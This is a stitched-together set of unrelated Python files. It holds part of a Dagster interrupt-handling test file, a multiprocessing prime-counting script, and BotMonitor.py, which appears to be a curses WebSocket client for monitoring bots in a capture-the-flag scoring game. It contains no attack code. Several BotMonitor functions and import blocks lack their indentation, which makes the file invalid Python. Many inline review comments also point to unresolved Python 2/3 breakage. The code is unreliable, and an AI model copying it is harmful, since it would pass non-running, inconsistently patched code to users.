    """raise_execution_interrupts() converts SIGINT to DagsterExecutionInterruptedError."""
    # Initialize the flag so a missing interrupt fails the assert below
    # instead of raising NameError on an unbound local.
    standard_interrupt = False
    with raise_execution_interrupts():
        try:
            _send_interrupt_to_self()
        except DagsterExecutionInterruptedError:
            standard_interrupt = True

    assert standard_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_inside_nested_delay_and_raise():
    """An interrupt inside nested raise_execution_interrupts() is raised
    there (as DagsterExecutionInterruptedError) and does not escape the
    outer capture_interrupts()."""
    interrupt_inside_nested_raise = False
    interrupt_after_delay = False

    try:
        with capture_interrupts():
            with raise_execution_interrupts():
                try:
                    _send_interrupt_to_self()
                except DagsterExecutionInterruptedError:
                    interrupt_inside_nested_raise = True
    except:  # pylint: disable=bare-except
        interrupt_after_delay = True

    assert interrupt_inside_nested_raise
    assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_no_interrupt_after_nested_delay_and_raise():
    """An interrupt sent after the nested raise block is captured silently
    by the enclosing capture_interrupts() and never raised."""
    interrupt_inside_nested_raise = False
    interrupt_after_delay = False

    try:
        with capture_interrupts():
            with raise_execution_interrupts():
                try:
                    time.sleep(5)
                except:  # pylint: disable=bare-except
                    interrupt_inside_nested_raise = True
            _send_interrupt_to_self()
    except:  # pylint: disable=bare-except
        interrupt_after_delay = True

    assert not interrupt_inside_nested_raise
    assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_calling_raise_execution_interrupts_also_raises_any_captured_interrupts():
    """Entering raise_execution_interrupts() re-raises an interrupt that was
    captured earlier by the surrounding capture_interrupts()."""
    interrupt_from_raise_execution_interrupts = False
    interrupt_after_delay = False

    try:
        with capture_interrupts():
            _send_interrupt_to_self()
            try:
                with raise_execution_interrupts():
                    pass
            except DagsterExecutionInterruptedError:
                interrupt_from_raise_execution_interrupts = True
    except:  # pylint: disable=bare-except
        interrupt_after_delay = True

    assert interrupt_from_raise_execution_interrupts
    assert not interrupt_after_delay
|
count_primes.py | import sys
from multiprocessing import Process, Value, Lock
def is_prime(n):
    """Return True if ``n`` is prime, using 6k +/- 1 trial division.

    Args:
        n (int): number to test (any integer; values <= 1 are not prime)

    Returns:
        bool: True when n is prime.
    """
    if n <= 1:
        return False
    if n <= 3:
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    # Every prime > 3 has the form 6k +/- 1, so step i by 6 and test both
    # i and i + 2 as candidate divisors up to sqrt(n).
    i = 5  # removed stray C-style semicolon
    while i * i <= n:
        if n % i == 0 or n % (i + 2) == 0:
            return False
        i += 6
    return True
def worker(limit, counter, total_result, lock):
    """Count primes among candidates claimed from a shared counter.

    Each worker repeatedly claims the next candidate from ``counter``
    (under ``lock``), tests it with ``is_prime``, and finally folds its
    local count into ``total_result``.

    Fixes two defects in the original:
      * ``result`` started at 1, overcounting by one per worker.
      * the loop condition tested a stale local ``i`` before fetching,
        so candidates >= limit could still be tested and counted.
    """
    result = 0
    while True:
        # Claim the next candidate atomically.
        with lock:
            i = counter.value
            counter.value += 1
        if i >= limit:
            break
        if is_prime(i):
            result += 1
    # Fold the local tally into the shared result under the lock.
    with lock:
        total_result.value += result
if __name__ == "__main__":
    # Usage: count_primes.py <limit> <nprocs>
    limit = int(sys.argv[1])
    nthreads = int(sys.argv[2])
    # 'i' = shared C int: counter hands out candidate numbers, result
    # accumulates the per-worker prime counts.
    result = Value('i', 0)
    counter = Value('i', 0)
    lock = Lock()
    workers = [Process(target=worker, args=(limit, counter, result, lock)) for i in range(nthreads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    print(result.value)
|
BotMonitor.py | #!/usr/bin/env python3
"""
Created on Apr 23, 2012
@author: moloch
---------
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
---------
Linux/OSX only (well anything with curses really)
Small program used by teams to monitor their flags
For the sake of portability everything is in one file
"""
# pylint: disable=unused-variable
###################
# > Imports
###################
import os
import sys
import time
import json
import uuid
import array
import struct
import base64
import socket
import random
import hashlib
import logging
import argparse
import platform
import threading
from builtins import range, object, chr, str
from past.utils import old_div
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from datetime import datetime
from libs.StringCoding import encode
try:
import curses
import curses.panel
except ImportError:
sys.stdout.write("Error: Failed to import curses, platform not supported\n")
os._exit(2)
###################
# > Constants
###################
BUFFER_SIZE = 64
# Minimum terminal dimensions the curses layout was designed for.
MIN_Y = 24
MIN_X = 80
###################
# > Defaults
###################
__version__ = "0.1.1"
__port__ = "8888"
__domain__ = "localhost"
# WebSocket resource path of the scoring engine's bot-monitor endpoint.
__path__ = "/botnet/climonitor"
__log__ = "bot_monitor.log"
###################
# > Logging
###################
# Maps the --log-level command line string to a logging level constant.
LOG_LEVELS = {
    "notset": logging.NOTSET,
    "debug": logging.DEBUG,
    "info": logging.INFO,
    "critical": logging.CRITICAL,
    "warn": logging.WARN,
    "error": logging.ERROR,
    "fatal": logging.FATAL,
}
# Root logger; main() attaches a FileHandler to it.
logger = logging.getLogger()
###################
# > Websockets
###################
"""
websocket python client.
=========================
This version support only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
class WebSocketException(Exception):
    """Base class for every websocket protocol error raised by this client."""
class WebSocketConnectionClosedException(WebSocketException):
    """Raised when the remote host closed the connection or a network
    error occurred."""
# Module-wide connect timeout in seconds; None means "no explicit timeout".
default_timeout = None
# When True, request/response headers and raw frames are echoed to the logger.
traceEnabled = False
def enableTrace(traceable):
    """
    Turn wire-level tracing on or off.
    traceable: boolean value. if set True, traceability is enabled.
    """
    global traceEnabled
    traceEnabled = traceable
    if traceEnabled:
        # Tracing is only visible at DEBUG verbosity.
        logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
    """
    Set the global timeout setting to connect.
    timeout: default socket timeout in seconds; values below 30 are
        clamped up to 30.
    """
    global default_timeout
    default_timeout = int(timeout)
    if default_timeout < 30:
        default_timeout = 30
    # Bug fix: log the value actually in effect (which may have been
    # clamped), not the raw argument.
    logging.info("Socket timeout set to: %d", default_timeout)
def getdefaulttimeout():
    """Return the global connect timeout in seconds (None when unset)."""
    return default_timeout
def _parse_url(url):
"""
parse url and the result is tuple of
(hostname, port, resource path and the flag of secure mode)
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
def create_connection(url, timeout=None, **options):
    """
    Connect to url and return the WebSocket object.
    Passing optional timeout parameter will set the timeout on the socket.
    If no timeout is supplied, the global default timeout setting returned
    by getdefaulttimeout() is used.
    You can customize using 'options'.
    If you set "header" dict object, you can set your own custom header.
    >>> conn = create_connection("ws://echo.websocket.org/",
    ...     header=["User-Agent: MyProgram",
    ...             "x-custom: header"])
    timeout: socket timeout time. This value is integer.
        if you set None for this value, it means "use default_timeout value"
    options: current support option is only "header".
        if you set header as dict value, the custom HTTP headers are added.
    """
    sockopt = options.get("sockopt", ())
    websock = WebSocket(sockopt=sockopt)
    # Bug fix: the old "timeout is not None and timeout or default_timeout"
    # idiom silently replaced an explicit timeout of 0 with the default.
    actual_timeout = timeout if timeout is not None else default_timeout
    logging.info("[Socket] Timeout: %d" % actual_timeout)
    websock.settimeout(actual_timeout)
    websock.connect(url, **options)
    return websock
# NOTE(review): the three values below appear unused in this file — they look
# like leftovers from the pre-RFC-6455 (hixie) key scheme; confirm and remove.
_MAX_INTEGER = (1 << 32) - 1
_AVAILABLE_KEY_CHARS = list(range(0x21, 0x2F + 1)) + list(range(0x3A, 0x7E + 1))
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
# Response headers (compared lowercased) that must carry exactly these values
# for the handshake response to be accepted.
_HEADERS_TO_CHECK = {"upgrade": "websocket", "connection": "upgrade"}
class _SSLSocketWrapper(object):
    # Minimal recv/send adapter exposing a socket-like API over a TLS channel.
    # NOTE(review): socket.ssl() is Python 2 only (removed in Python 3); under
    # the python3 interpreter the shebang requests, wss:// connections will
    # fail here — confirm and port to the ssl module if TLS is needed.
    def __init__(self, sock):
        self.ssl = socket.ssl(sock)

    def recv(self, bufsize):
        # Read up to bufsize bytes from the TLS channel.
        return self.ssl.read(bufsize)

    def send(self, payload):
        # Write payload to the TLS channel.
        return self.ssl.write(payload)
_BOOL_VALUES = (0, 1)
def _is_bool(*values):
for v in values:
if v not in _BOOL_VALUES:
return False
return True
class ABNF(object):
    """
    ABNF frame class.
    see http://tools.ietf.org/html/rfc5234
    and http://tools.ietf.org/html/rfc6455#section-5.2
    """

    # operation code values.
    OPCODE_TEXT = 0x1
    OPCODE_BINARY = 0x2
    OPCODE_CLOSE = 0x8
    OPCODE_PING = 0x9
    OPCODE_PONG = 0xA
    # available operation code value tuple
    OPCODES = (OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)
    # opcode human readable string
    OPCODE_MAP = {
        OPCODE_TEXT: "text",
        OPCODE_BINARY: "binary",
        OPCODE_CLOSE: "close",
        OPCODE_PING: "ping",
        OPCODE_PONG: "pong",
    }
    # data length threshold.
    # <= 125 fits in the 7-bit length field; < 2**16 uses a 2-byte extended
    # length; anything up to 2**63 uses an 8-byte extended length (RFC 6455 5.2).
    LENGTH_7 = 0x7D
    LENGTH_16 = 1 << 16
    LENGTH_63 = 1 << 63

    def __init__(
        self, fin=0, rsv1=0, rsv2=0, rsv3=0, opcode=OPCODE_TEXT, mask=1, data=""
    ):
        """
        Constructor for ABNF.
        please check RFC for arguments.
        """
        self.fin = fin
        self.rsv1 = rsv1
        self.rsv2 = rsv2
        self.rsv3 = rsv3
        self.opcode = opcode
        self.mask = mask
        self.data = data
        # Default mask-key source: 4 random bytes per frame. Tests can swap
        # this out via WebSocket.set_mask_key.
        self.get_mask_key = os.urandom

    @staticmethod
    def create_frame(data, opcode):
        """
        create frame to send text, binary and other data.
        data: data to send. This is string value(byte array).
            if opcode is OPCODE_TEXT and this value is unicode,
            data value is converted into unicode string, automatically.
        opcode: operation code. please see OPCODE_XXX.
        """
        # Text payloads must go over the wire UTF-8 encoded; binary payloads
        # are passed through untouched.
        if sys.version_info.major == 2:
            instance = isinstance(data, unicode)
        else:
            instance = isinstance(data, str)
        if opcode == ABNF.OPCODE_TEXT and instance:
            data = encode(data, "utf-8")
        # mask must be set if send data from client
        return ABNF(1, 0, 0, 0, opcode, 1, data)

    def format(self):
        """
        format this object to string(byte array) to send data to server.
        """
        # The four header flags are single bits; reject anything else.
        if not _is_bool(self.fin, self.rsv1, self.rsv2, self.rsv3):
            raise ValueError("not 0 or 1")
        if self.opcode not in ABNF.OPCODES:
            raise ValueError("Invalid OPCODE")
        length = len(self.data)
        if length >= ABNF.LENGTH_63:
            raise ValueError("data is too long")
        # First header byte: FIN | RSV1-3 | opcode.
        # NOTE(review): chr() returns str while struct.pack returns bytes on
        # Python 3, so the concatenations below are Python 2 semantics —
        # confirm before running this under the python3 shebang.
        frame_header = chr(
            self.fin << 7
            | self.rsv1 << 6
            | self.rsv2 << 5
            | self.rsv3 << 4
            | self.opcode
        )
        # Second byte: MASK bit plus the 7-bit length, or the 0x7E/0x7F
        # escape followed by a 16- or 64-bit big-endian extended length.
        if length < ABNF.LENGTH_7:
            frame_header += chr(self.mask << 7 | length)
        elif length < ABNF.LENGTH_16:
            frame_header += chr(self.mask << 7 | 0x7E)
            frame_header += struct.pack("!H", length)
        else:
            frame_header += chr(self.mask << 7 | 0x7F)
            frame_header += struct.pack("!Q", length)
        if not self.mask:
            return frame_header + self.data
        else:
            # Client-to-server frames carry a fresh 4-byte mask key followed
            # by the XOR-masked payload.
            mask_key = self.get_mask_key(4)
            return frame_header + self._get_masked(mask_key)

    def _get_masked(self, mask_key):
        # Prepend the key so the server can unmask the payload.
        s = ABNF.mask(mask_key, self.data)
        return mask_key + "".join(s)

    @staticmethod
    def mask(mask_key, data):
        """
        mask or unmask data. Just do xor for each byte
        mask_key: 4 byte string(byte).
        data: data to mask/unmask.
        """
        _m = array.array("B", mask_key)
        _d = array.array("B", data)
        # XOR is its own inverse, so the same routine masks and unmasks.
        for i in range(len(_d)):
            _d[i] ^= _m[i % 4]
        # NOTE(review): array.tostring() was removed in Python 3.9; the
        # modern spelling is tobytes() — confirm target interpreter.
        return _d.tostring()
class WebSocket(object):
    """
    Low level WebSocket interface.
    This class is based on
    The WebSocket protocol draft-hixie-thewebsocketprotocol-76
    http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
    We can connect to the websocket server and send/receive data.
    The following example is a echo client.
    >>> import websocket
    >>> ws = websocket.WebSocket()
    >>> ws.connect("ws://echo.websocket.org")
    >>> ws.send("Hello, Server")
    >>> ws.recv()
    'Hello, Server'
    >>> ws.close()
    get_mask_key: a callable to produce new mask keys, see the set_mask_key
    function's docstring for more details
    sockopt: values for socket.setsockopt.
    sockopt must be tuple and each element is argument of sock.setsockopt.
    """

    def __init__(self, get_mask_key=None, sockopt=()):
        """
        Initialize WebSocket object.
        """
        self.connected = False
        # Assigned externally (WebSocketApp.run_forever) so pong() can flag
        # received pings on the BotMonitor UI.
        self.monitor = None
        # io_sock is what we actually read/write; for wss:// it is replaced
        # by an SSL wrapper while sock stays the raw TCP socket.
        self.io_sock = self.sock = socket.socket()
        for opts in sockopt:
            self.sock.setsockopt(*opts)
        self.get_mask_key = get_mask_key

    def set_mask_key(self, func):
        """
        set function to create musk key. You can customize mask key generator.
        Mainly, this is for testing purpose.
        func: callable object. the fuct must 1 argument as integer.
            The argument means length of mask key.
            This func must be return string(byte array),
            which length is argument specified.
        """
        self.get_mask_key = func

    def settimeout(self, timeout):
        """
        Set the timeout to the websocket.
        timeout: timeout time(second).
        """
        self.sock.settimeout(timeout)

    def gettimeout(self):
        """
        Get the websocket timeout(second).
        """
        return self.sock.gettimeout()

    def connect(self, url, **options):
        """
        Connect to url. url is websocket url scheme. ie. ws://host:port/resource
        You can customize using 'options'.
        If you set "header" dict object, you can set your own custom header.
        >>> ws = WebSocket()
        >>> ws.connect("ws://echo.websocket.org/",
        ...     header={"User-Agent: MyProgram",
        ...             "x-custom: header"})
        timeout: socket timeout time. This value is integer.
            if you set None for this value,
            it means "use default_timeout value"
        options: current support option is only "header".
            if you set header as dict value,
            the custom HTTP headers are added.
        """
        hostname, port, resource, is_secure = _parse_url(url)
        # TODO: we need to support proxy
        self.sock.connect((hostname, port))
        if is_secure:
            # Route all subsequent I/O through the TLS wrapper.
            self.io_sock = _SSLSocketWrapper(self.sock)
        self._handshake(hostname, port, resource, **options)

    def _handshake(self, host, port, resource, **options):
        # Build and send the HTTP/1.1 Upgrade request, then validate the
        # 101 Switching Protocols response (RFC 6455 section 4).
        sock = self.io_sock
        headers = []
        headers.append("GET %s HTTP/1.1" % resource)
        headers.append("Upgrade: websocket")
        headers.append("Connection: Upgrade")
        # Omit the default port from the Host header, as HTTP convention.
        if port == 80:
            hostport = host
        else:
            hostport = "%s:%d" % (host, port)
        headers.append("Host: %s" % hostport)
        if "origin" in options:
            headers.append("Origin: %s" % options["origin"])
        else:
            headers.append("Origin: http://%s" % hostport)
        key = _create_sec_websocket_key()
        headers.append("Sec-WebSocket-Key: %s" % key)
        headers.append("Sec-WebSocket-Version: %s" % VERSION)
        if "header" in options:
            headers.extend(options["header"])
        # Two trailing empty strings produce the blank line ending the request.
        headers.append("")
        headers.append("")
        header_str = "\r\n".join(headers)
        sock.send(header_str)
        if traceEnabled:
            logger.debug("--- request header ---")
            logger.debug(header_str)
            logger.debug("-----------------------")
        status, resp_headers = self._read_headers()
        if status != 101:
            self.close()
            raise WebSocketException("Handshake Status %d" % status)
        success = self._validate_header(resp_headers, key)
        if not success:
            self.close()
            raise WebSocketException("Invalid WebSocket Header")
        self.connected = True

    def _validate_header(self, headers, key):
        # Every required header must be present with the expected value.
        for k, v in list(_HEADERS_TO_CHECK.items()):
            r = headers.get(k, None)
            if not r:
                return False
            r = r.lower()
            if v != r:
                return False
        # Sec-WebSocket-Accept must equal base64(sha1(key + magic GUID)).
        result = headers.get("sec-websocket-accept", None)
        if not result:
            return False
        result = result.lower()
        value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
        # NOTE(review): hashlib.sha1 requires bytes on Python 3, and
        # base64.encodestring was removed in 3.9 — this line is Python 2
        # era; confirm against the target interpreter.
        hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
        return hashed == result

    def _read_headers(self):
        # Parse the HTTP status line plus headers, stopping at the blank line.
        status = None
        headers = {}
        if traceEnabled:
            logger.debug("--- response header ---")
        while True:
            line = self._recv_line()
            if line == "\r\n":
                break
            line = line.strip()
            if traceEnabled:
                logger.debug(line)
            if not status:
                # First line: "HTTP/1.1 101 Switching Protocols".
                status_info = line.split(" ", 2)
                status = int(status_info[1])
            else:
                kv = line.split(":", 1)
                if len(kv) == 2:
                    key, value = kv
                    # Keys and values are lowercased for case-insensitive lookup.
                    headers[key.lower()] = value.strip().lower()
                else:
                    raise WebSocketException("Invalid header")
        if traceEnabled:
            logger.debug("-----------------------")
        return status, headers

    def send(self, payload, opcode=ABNF.OPCODE_TEXT):
        """
        Send the data as string.
        payload: Payload must be utf-8 string or unicode,
            if the opcode is OPCODE_TEXT.
            Otherwise, it must be string(byte array)
        opcode: operation code to send. Please see OPCODE_XXX.
        """
        frame = ABNF.create_frame(payload, opcode)
        if self.get_mask_key:
            frame.get_mask_key = self.get_mask_key
        data = frame.format()
        # Loop because socket.send may transmit only part of the buffer.
        while data:
            l = self.io_sock.send(data)
            data = data[l:]
        if traceEnabled:
            # NOTE(review): data has been fully consumed by the loop above,
            # so this always traces an empty string — presumably the original
            # frame was meant to be logged; confirm and fix.
            logger.debug("send: " + repr(data))

    def ping(self, payload=""):
        """
        send ping data.
        payload: data payload to send server.
        """
        logging.debug("Got <- PING")
        self.send(payload, ABNF.OPCODE_PING)

    def pong(self, payload):
        """
        send pong data.
        payload: data payload to send server.
        """
        logging.debug("Sending -> PONG")
        # Flag the UI so the progress bar can flash the PNG indicator.
        self.monitor.pong = True
        self.send(payload, ABNF.OPCODE_PONG)

    def recv(self):
        """
        Receive string data(byte array) from the server.
        return value: string(byte array) value.
        """
        opcode, data = self.recv_data()
        return data

    def recv_data(self):
        """
        Receive data with operation code.
        return value: tuple of operation code and string(byte array) value.
        """
        # Loop so that control frames (ping) are handled transparently and
        # only data/close frames are surfaced to the caller.
        while True:
            frame = self.recv_frame()
            if not frame:
                # handle error:
                # 'NoneType' object has no attribute 'opcode'
                raise WebSocketException("Not a valid frame %s" % frame)
            elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
                return (frame.opcode, frame.data)
            elif frame.opcode == ABNF.OPCODE_CLOSE:
                # Echo the close handshake; callers see (CLOSE, None).
                self.send_close()
                return (frame.opcode, None)
            elif frame.opcode == ABNF.OPCODE_PING:
                self.pong(frame.data)

    def recv_frame(self):
        """
        receive data as frame from server.
        return value: ABNF frame object.
        """
        # Two fixed header bytes: flags/opcode and mask-bit/length.
        header_bytes = self._recv_strict(2)
        if not header_bytes:
            return None
        b1 = ord(header_bytes[0])
        fin = b1 >> 7 & 1
        rsv1 = b1 >> 6 & 1
        rsv2 = b1 >> 5 & 1
        rsv3 = b1 >> 4 & 1
        opcode = b1 & 0xF
        b2 = ord(header_bytes[1])
        mask = b2 >> 7 & 1
        length = b2 & 0x7F
        length_data = ""
        # 0x7E/0x7F escape values signal 16- or 64-bit extended lengths.
        if length == 0x7E:
            length_data = self._recv_strict(2)
            length = struct.unpack("!H", length_data)[0]
        elif length == 0x7F:
            length_data = self._recv_strict(8)
            length = struct.unpack("!Q", length_data)[0]
        mask_key = ""
        if mask:
            mask_key = self._recv_strict(4)
        data = self._recv_strict(length)
        if traceEnabled:
            received = header_bytes + length_data + mask_key + data
            logger.debug("recv: " + repr(received))
        if mask:
            # XOR-unmask using the 4-byte key (same routine as masking).
            data = ABNF.mask(mask_key, data)
        frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, mask, data)
        return frame

    def send_close(self, status=STATUS_NORMAL, reason=""):
        """
        send close data to the server.
        status: status code to send. see STATUS_XXX.
        reason: the reason to close. This must be string.
        """
        if status < 0 or status >= ABNF.LENGTH_16:
            raise ValueError("code is invalid range")
        self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)

    def close(self, status=STATUS_NORMAL, reason=""):
        """
        Close Websocket object
        status: status code to send. see STATUS_XXX.
        reason: the reason to close. This must be string.
        """
        if self.connected:
            if status < 0 or status >= ABNF.LENGTH_16:
                raise ValueError("code is invalid range")
            try:
                # Initiate the close handshake, then wait briefly (3s) for the
                # server's close frame before shutting the socket down.
                self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
                timeout = self.sock.gettimeout()
                self.sock.settimeout(3)
                try:
                    frame = self.recv_frame()
                    if logger.isEnabledFor(logging.ERROR):
                        recv_status = struct.unpack("!H", frame.data)[0]
                        if recv_status != STATUS_NORMAL:
                            logger.error("close status: " + repr(recv_status))
                except:
                    # Best effort: a lost/late close frame is not an error.
                    pass
                self.sock.settimeout(timeout)
                self.sock.shutdown(socket.SHUT_RDWR)
            except:
                pass
        self._closeInternal()

    def _closeInternal(self):
        self.connected = False
        self.sock.close()
        # Drop any SSL wrapper; io_sock points back at the raw socket.
        self.io_sock = self.sock

    def _recv(self, bufsize):
        # An empty read means the peer closed the connection.
        bytes = self.io_sock.recv(bufsize)
        if not bytes:
            raise WebSocketConnectionClosedException()
        return bytes

    def _recv_strict(self, bufsize):
        # Keep reading until exactly bufsize bytes have arrived.
        remaining = bufsize
        bytes = ""
        while remaining:
            bytes += self._recv(remaining)
            remaining = bufsize - len(bytes)
        return bytes

    def _recv_line(self):
        # Read a single header line, byte by byte, up to and including "\n".
        line = []
        while True:
            c = self._recv(1)
            line.append(c)
            if c == "\n":
                break
        return "".join(line)
class WebSocketApp(object):
    """
    Higher level of APIs are provided.
    The interface is like JavaScript WebSocket object.
    """

    def __init__(
        self,
        url,
        header=None,
        on_open=None,
        on_message=None,
        on_error=None,
        on_close=None,
        keep_running=True,
        get_mask_key=None,
        sockopt=(),
    ):
        """
        url: websocket url.
        header: custom header for websocket handshake.
        on_open: callable object which is called at opening websocket.
            this function has one argument. The argument is this class object.
        on_message: callable object which is called when received data.
            on_message has 2 arguments.
            The 1st argument is this class object.
            The passing 2nd argument is utf-8 string which we get from the server.
        on_error: callable object which is called when we get error.
            on_error has 2 arguments.
            The 1st argument is this class object.
            The passing 2nd argument is exception object.
        on_close: callable object which is called when closed the connection.
            this function has one argument. The argument is this class object.
        keep_running: a boolean flag indicating whether the app's main loop should
            keep running, defaults to True
        get_mask_key: a callable to produce new mask keys, see the WebSocket.set_mask_key's
            docstring for more information
        """
        self.url = url
        self.header = header or []
        self.on_open = on_open
        self.on_message = on_message
        self.on_error = on_error
        self.on_close = on_close
        self.keep_running = keep_running
        self.get_mask_key = get_mask_key
        self.sock = None
        # Bug fix: run_forever reads self.monitor, but it was never
        # initialized here — an AttributeError if the caller did not assign
        # it externally. Default to None (no UI attached).
        self.monitor = None

    def send(self, data, opcode=ABNF.OPCODE_TEXT):
        """
        send message.
        data: message to send. If you set opcode to OPCODE_TEXT, data must be utf-8 string or unicode.
        opcode: operation code of data. default is OPCODE_TEXT.
        """
        # NOTE(review): WebSocket.send returns None, so this guard never
        # fires; kept for interface compatibility.
        if self.sock.send(data, opcode) == 0:
            raise WebSocketConnectionClosedException()

    def close(self):
        """
        close websocket connection.
        """
        self.keep_running = False
        self.sock.close()

    def run_forever(self, sockopt=()):
        """
        run event loop for WebSocket framework.
        This loop is infinite loop and is alive during websocket is available.
        sockopt: values for socket.setsockopt.
            sockopt must be tuple and each element is argument of sock.setsockopt.
        """
        if self.sock:
            raise WebSocketException("socket is already opened")
        try:
            self.sock = WebSocket(self.get_mask_key, sockopt=sockopt)
            self.sock.settimeout(getdefaulttimeout())
            self.sock.connect(self.url, header=self.header)
            # Give the low-level socket a handle on the UI monitor so that
            # pong() can flag received pings.
            self.sock.monitor = self.monitor
            self._run_with_no_err(self.on_open)
            while self.keep_running:
                data = self.sock.recv()
                if data is None:
                    # Server initiated the close handshake.
                    break
                self._run_with_no_err(self.on_message, data)
        except KeyboardInterrupt:
            pass  # Just close and exit
        except Exception as e:
            self._run_with_no_err(self.on_error, e)
        finally:
            # Bug fix: guard against self.sock still being None when the
            # WebSocket constructor itself raised.
            if self.sock is not None:
                self.sock.close()
            self._run_with_no_err(self.on_close)
            self.sock = None

    def _run_with_no_err(self, callback, *args):
        # Invoke an optional user callback, never letting its exceptions
        # escape into the event loop.
        if callback:
            try:
                callback(self, *args)
            except Exception as err:
                if logger.isEnabledFor(logging.DEBUG):
                    logger.error(err)
###################
# > Time to Str
###################
def current_time():
    """Return the current local time formatted as HH:MM:SS."""
    return time.strftime("%H:%M:%S", time.localtime())
###################
# > Opcodes
###################
def stop_animate_thread(ws):
    """Signal the UI animation thread to stop and block until it has exited."""
    logging.info("Waiting for animation thread to exit ...")
    monitor = ws.monitor
    # Raise the stop flag first so the animation loop can notice it.
    monitor.stop_thread = True
    thread = monitor.animate_thread
    if thread is not None:
        thread.join()
    logging.info("All threads have joined")
    # Reset so a fresh animation thread can be started later.
    monitor.animate_thread = None
    monitor.stop_thread = False
def update(ws, message):
    """Receive the latest bot snapshot from the engine and redraw the grid."""
    logging.debug("Got update: %s" % message)
    # Flatten each bot record into the (name, ip, reward) tuples the grid draws.
    bots = [
        (bot["box_name"], bot["remote_ip"], bot["total_reward"])
        for bot in message["bots"]
    ]
    ws.monitor.update_grid(bots)
def auth_failure(ws, message):
    """Scoring engine rejected our credentials: halt animation, show denial."""
    logging.info("Authentication failure")
    stop_animate_thread(ws)
    ws.monitor.auth_failure("ACCESS DENIED")
def auth_success(ws, message):
    """ Successfully authenticated with scoring engine"""
    # Stop the "connecting" animation before starting the progress animation.
    stop_animate_thread(ws)
    logging.info("Successfully authenticated")
    # Run the footer progress/pong animation on its own thread.
    thread = threading.Thread(target=ws.monitor.progress)
    thread.start()
    ws.monitor.animate_thread = thread
    # Draw the main monitoring interface now that we are logged in.
    ws.monitor.__interface__()
def ping(ws, message):
    """Server ping received: flag it so the progress bar can flash 'PNG'."""
    ws.monitor.pong = True
# Dispatch table: server message opcode -> handler(ws, message).
OPCODES = {
    "update": update,
    "auth_success": auth_success,
    "auth_failure": auth_failure,
    "ping": ping,
}
###################
# > WS Callbacks
###################
def on_open(ws):
    """Socket is open: send our credentials to the scoring engine."""
    logging.info("Sending credentials to engine")
    credentials = {
        "opcode": "auth",
        "handle": ws.agent_name,
        "password": ws.password,
    }
    ws.send(json.dumps(credentials))
    # Allow UI animation threads to run again.
    ws.monitor.stop_thread = False
def on_message(ws, message):
    """Decode a JSON message and dispatch it by opcode; close on bad input."""
    logging.debug("Recv'd message: %s" % str(message))
    try:
        response = json.loads(message)
        # Guard clauses: malformed messages are treated like malformed JSON.
        if "opcode" not in response:
            raise ValueError("Missing opcode")
        if response["opcode"] not in OPCODES:
            raise ValueError("Invalid opcode")
        OPCODES[response["opcode"]](ws, response)
    except ValueError:
        # json.JSONDecodeError subclasses ValueError, so this also catches
        # unparseable payloads.
        ws.close()
def on_error(ws, error):
    """ Error recv'd on WebSocket """
    logging.exception("[WebSocket] on_error - %s" % type(error))
    stop_animate_thread(ws)
    # Network-level and protocol-level failures both surface the same
    # "connection failure" screen, which itself exits the process.
    if isinstance(error, socket.error):
        ws.monitor.connection_problems()
    elif isinstance(error, WebSocketException):
        ws.monitor.connection_problems()
    # Reached only for other error types, since connection_problems()
    # terminates via BotMonitor.stop()/os._exit.
    ws.monitor.stop()
def on_close(ws):
    """ Websocket closed """
    logging.debug("[WebSocket] Closing connection.")
    # Join the animation thread before tearing down curses, then exit.
    stop_animate_thread(ws)
    ws.monitor.stop("Connection lost")
###################
